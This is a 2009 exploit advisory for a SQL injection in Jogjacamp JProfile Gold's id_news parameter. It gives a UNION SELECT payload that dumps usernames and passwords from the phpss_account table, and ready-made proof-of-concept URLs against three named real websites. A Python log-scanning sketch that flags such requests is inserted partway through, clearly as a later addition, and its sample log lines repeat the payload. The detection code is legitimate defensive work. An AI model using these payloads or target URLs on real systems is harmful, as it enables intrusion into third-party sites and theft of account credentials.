
# Title : Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability
# Published : 2009-03-03
# Author : kecemplungkalen


###############################################################




###############################################################


Jogjacamp JProfile Gold SQL Injection

by kecemplungkalen 

Vendor  : http://jogjacamp.com

bugs	: /index.php?action=news.detail&id_news=

exploit : union select concat(username,0x3a,password),2,3 from phpss_account--

POC	: http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

	  http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

	  http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
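
A detection sketch for the request pattern above, added here as an example (it is not part of the original advisory or of JProfile Gold): it flags access-log requests to `action=news.detail` whose `id_news` is not a plain integer. It assumes combined-format access logs and that legitimate `id_news` values are always numeric; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request field of a combined-format access log line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL syntax that never belongs in a numeric id (the advisory's payload uses UNION SELECT)
SQL_RE = re.compile(r"\b(?:union|select|concat|from)\b|--|/\*", re.I)

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %2520) so keywords cannot hide behind it."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return None for a benign line, else (verdict, decoded id_news value)."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if query.get("action") != ["news.detail"]:
        return None
    for raw in query.get("id_news", []):  # parse_qs already decoded one layer
        value = fully_decode(raw)
        if re.fullmatch(r"[0-9]+", value):
            continue  # assumption: a legitimate news id is digits only
        return ("sqli" if SQL_RE.search(value) else "non-numeric"), value
    return None

def scan(lines):
    """Return (line_number, verdict, value) for every suspicious request."""
    results = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, *r) for n, r in results if r]

# Constructed sample log lines (documentation IP ranges), not taken from any real server
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Mar/2009:10:00:01 +0700] "GET /index.php?action=news.detail&id_news=42 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [03/Mar/2009:10:00:05 +0700] "GET /index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20-- HTTP/1.1" 200 4800',
    '198.51.100.7 - - [03/Mar/2009:10:00:09 +0700] "GET /index.php?action=news.detail&id_news=42%27 HTTP/1.1" 200 310',
    '192.0.2.11 - - [03/Mar/2009:10:00:12 +0700] "GET /index.php?action=home HTTP/1.1" 200 9000',
    '203.0.113.5 - - [03/Mar/2009:10:00:20 +0700] "GET /index.php?action=news.detail&id_news=1%2520UNION%2520SELECT%25201,2,3 HTTP/1.1" 200 4800',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Detection only shows who probed the parameter; the fix is to cast `id_news` to an integer or bind it in a parameterized query before it reaches the database.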

###############################################################

greetz	: Allah
	  s3t4n and Paman aka Jack-
	  my family
	  and all Mainhack BrotherHood 
	  jupe crew, stop gaming all the time :p
